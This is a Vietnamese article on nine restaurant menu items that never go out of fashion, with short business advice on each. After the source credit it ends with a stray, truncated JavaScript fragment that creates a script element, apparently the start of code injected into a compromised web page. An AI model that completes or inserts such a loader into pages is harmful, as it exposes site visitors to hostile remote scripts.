9 món trong menu không bao giờ lỗi thời

Cũng giống như thời trang, thị hiếu của con người thay đổi và phát triển theo thời gian. Điều này làm cho việc tạo một thực đơn nhà hàng bền vững phức tạp hơn. Làm thế nào bạn biết những gì khách hàng muốn trong một năm kể từ bây giờ? Hai năm kể từ bây giờ? Tin tốt là các món trong menu sẽ không bao giờ lỗi mốt như: burger, pizza, món đặc sản. Giống như bạn yêu thích quần jean màu xanh, các món cổ điển có thể cập nhật xu hướng như thêm bơ, Sriracha hoặc kim chi.

Salad

Không có vấn đề gì đối với món này bởi salad không bao giờ thiếu trong mỗi nhà hàng. Món salad hấp dẫn một phần do nó thường được coi là món tốt cho sức khỏe trên menu (ngay cả khi nó không được như vậy). Cùng với các món trong thực đơn, salad có chi phí thức ăn hợp lý và chi phí lao động thấp, giữ lợi nhuận nhà hàng tăng lên.

Burger

Ngay cả các nhà hàng cao cấp như Ai Fiori ở New York và Sepia ở Chicago, bánh mì kẹp thịt đặc trưng vẫn có trên menu. Burger có thể quết bơ, kẹp thịt xông khói, nấm xào, thậm chí bơ đậu phộng…

Món tráng miệng

Món tráng miệng cổ điển như bánh, bánh bông lan có sức hấp dẫn vượt thời gian. Nếu bạn không làm món tráng miệng ở nhà, thật dễ dàng để tìm thấy những nhà hàng làm món này chất lượng tốt. Món tráng miệng có thể bán khó hơn – với những người muốn giữ eo. Một cách để tăng doanh số bán hàng các món tráng miệng tại nhà hàng là hãy đưa ra một cuộc thi cho các nhân viên phục vụ để xem ai có thể bán được nhiều nhất trong tuần hoặc tháng.

Bia & Rượu

Trong khi xu hướng dùng cocktail có thể đến và đi – Không giống như rượu mạnh, bia và rượu vang có sức hấp dẫn không thể chối từ. Bạn có thể lựa chọn loại bia hay rượu vang tại nhà hàng phù hợp với bạn.

Thịt nướng /Các món nướng

Đánh giá những món yêu thích lâu năm có tỷ lệ cao của Hiệp hội Nhà hàng Ẩm thực Dự báo quốc gia, món nướng vẫn phổ biến với thực khách.

Rau

Khi ngày càng nhiều người tìm kiếm sự lựa chọn nhà hàng với những món tốt cho sức khỏe hơn khi họ ra ngoài ăn, rau là món bắt buộc có hay chính là món chính của nhà hàng.

Món ăn đặc trưng địa phương

Món ăn đặc trưng địa phương có sức hút vượt thời gian. Thực khách đặc biệt thích những món ăn gắn với một câu chuyện về sự ra đời, và món ăn đặc trưng địa phương cung cấp được điều đó. Có lẽ sẽ tốn tiền hơn nếu mua thông qua một nhà phân phối thực phẩm lớn, mua sản phẩm từ các trang trại lân cận sẽ giúp nền kinh tế địa phương phát triển và giảm chi phí đầu vào cho chính nhà hàng.

Canh/Soup

Soup chưa bao giờ lỗi thời, nó luôn luôn ở đó khi bạn tìm. Kết hợp súp hoặc salad, bạn đã có một trong những mặt hàng ăn trưa phổ biến nhất từng xuất hiện. Dễ dàng để làm từ đầu với chi phí không quá cao, canh chắc chắn phải nằm trong thực đơn nhà hàng của bạn.

Món đặc biệt

Mỗi thực đơn nên có một vài món cốt lõi mà đặt ngoài các gói. Bất cứ điều gì mà bạn làm tốt ở nhà hàng, tiếp tục làm. Nếu bạn được biết đến là nàh hàng BBQ tốt nhất trong khu vực, những người sẽ không bao giờ chán nhà hàng kiểu này. Nếu món tráng miệng tự chế biến đưa bạn lên bản đồ ẩm thực địa phương, hãy tiếp tục làm chúng. Mỗi thực đơn nên có một vài món nổi bật đặc sản và làm cho nó độc đáo.

Theo Aboutmoney

var d=document;var s=d.createElement(‘script’);